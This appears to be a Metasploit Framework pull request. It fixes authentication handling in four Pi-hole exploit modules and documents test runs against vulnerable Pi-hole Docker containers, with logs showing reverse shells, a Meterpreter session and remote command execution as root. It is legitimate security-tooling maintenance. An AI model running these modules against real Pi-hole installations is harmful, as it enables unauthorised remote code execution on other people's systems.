### PR TITLE
Fix login crash for pihole modules

### DIFF
--- a/modules/auxiliary/admin/http/pihole_domains_api_exec.rb
+++ b/modules/auxiliary/admin/http/pihole_domains_api_exec.rb
@@ -100,8 +100,8 @@ class MetasploitModule < Msf::Auxiliary
 
     # check if we got hit by a login prompt
     if res && res.body.include?('Sign in to start your session')
-      cookie = login
-      fail_with(Failure::BadConfig, 'Incorrect Password') if cookie.nil?
+      res = login(datastore['PASSWORD'])
+      fail_with(Failure::BadConfig, 'Incorrect Password') if res.nil?
     end
 
     token = get_token('api')

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # check if we got hit by a login prompt
       if res && res.body.include?('Sign in to start your session')
-        res = login
+        res = login(datastore['PASSWORD'])
         fail_with(Failure::BadConfig, 'Incorrect Password') if res.nil?
       end
 

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -129,8 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # check if we got hit by a login prompt
       if res && res.body.include?('Sign in to start your session')
-        cookie = login
-        fail_with(Msf::Exploit::Failure::BadConfig, 'Incorrect Password') if cookie.nil?
+        res = login(datastore['PASSWORD'])
+        fail_with(Msf::Exploit::Failure::BadConfig, 'Incorrect Password') if res.nil?
       end
 
       token = get_token('piholedhcp')

--- a/modules/exploits/unix/http/pihole_whitelist_exec.rb
+++ b/modules/exploits/unix/http/pihole_whitelist_exec.rb
@@ -63,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # check if we got hit by a login prompt
     if res && res.body.include?('Sign in to start your session')
-      cookie = login
+      res = login(datastore['PASSWORD'])
+      fail_with(Failure::BadConfig, 'Incorrect Password') if res.nil?
       # res = send_request_cgi(
       #   'uri' => normalize_uri(target_uri.path, 'admin', 'list.php'),
       #   'keep_cookies' => 'true',
@@ -85,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'method' => 'POST',
       'ctype' => 'application/x-www-form-urlencoded',
-      'cookie' => cookie,
       'keep_cookies' => 'true',
       'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'add.php'),
       'vars_post' => {


### PR DESCRIPTION
Fixes a crash in various pihole modules when login authentication is required

closes https://github.com/rapid7/metasploit-framework/issues/16519

## Verification

### pihole_blocklist_exec

Create a pihole environment which requires authentication:

`docker-compose.yml`:

```yml
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3.2
    ports:
      - "8000:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'abc'
```

Running:
```
docker-compose up
```

Using module and getting a shell:
```
use exploit/unix/http/pihole_blocklist_exec
rerun http://admin:abc@192.168.123.1:8000/ srvhost=192.168.123.1 lhost=192.168.123.1
```

Log

```
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Using URL: http://192.168.123.1/
[*] Using token: IkTEQqFUpiIvgjfVtfva9O5CobpMyJs8EnbHCAx2FkE=
[*] Adding backdoor reference
[*] Sending 2nd gravity update request.
[*] Adding root reference
[*] Sending 2nd gravity update request.
[*] Sending stage (39860 bytes) to 192.168.123.1
[+] Deleted W7YnkQHOL.php
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.1:50417) at 2022-05-04 19:48:49 +0100

[*] Blocklists must be removed manually from /admin/settings.php?tab=blocklists
[*] Server stopped.

meterpreter > 
```

### pihole_domains_api_exec

Create a pihole environment which requires authentication:

`docker-compose.yml`:

```yml
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:v5.4
    ports:
      - "8000:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'abc'
```

Running:
```
docker-compose up
```

msfconsole running the command:

```
use auxiliary/admin/http/pihole_domains_api_exec
rerun http://admin:abc@192.168.123.1:8000/ command=whoami
```

Output

```
[*] Reloading module...
[*] Running module against 192.168.123.1

[*] Using token: HpwOZWvAVnnBiXdy58YL44+tMIrY+Kq4pQOIs5eLvDw=
[*] Sending payload request
[+] root
[*] Auxiliary module execution completed
```

### pihole_whitelist_exec

I wasn't able to easily get pihole 3.3 running, so I cut out the version check and tested against an older version to ensure logging in works

### pihole_dhcp_mac_exec

Create a pihole environment which requires authentication:

`docker-compose.yml`:

```yml
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3.2
    ports:
      - "8000:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'abc'
```

Running:
```
docker-compose up
```

Using module and getting a shell:
```
use exploit/unix/http/pihole_dhcp_mac_exec
rerun http://admin:abc@192.168.123.1:8000/ lhost=192.168.123.1
```

Log

```
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Using token: 3i8yqe4v/ErNjgZrxwLGft4SXlsn8uBBQRExdinH8CQ=
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: D26D2C89FE45
[*] Sending Exploit
[*] Attempting to clean 3F37B07E543E from config
[*] Attempting to clean D26D2C89FE45 from config
[*] Command shell session 3 opened (192.168.123.1:4444 -> 192.168.123.1:51919) at 2022-05-04 20:36:28 +0100

whoami
www-data
```
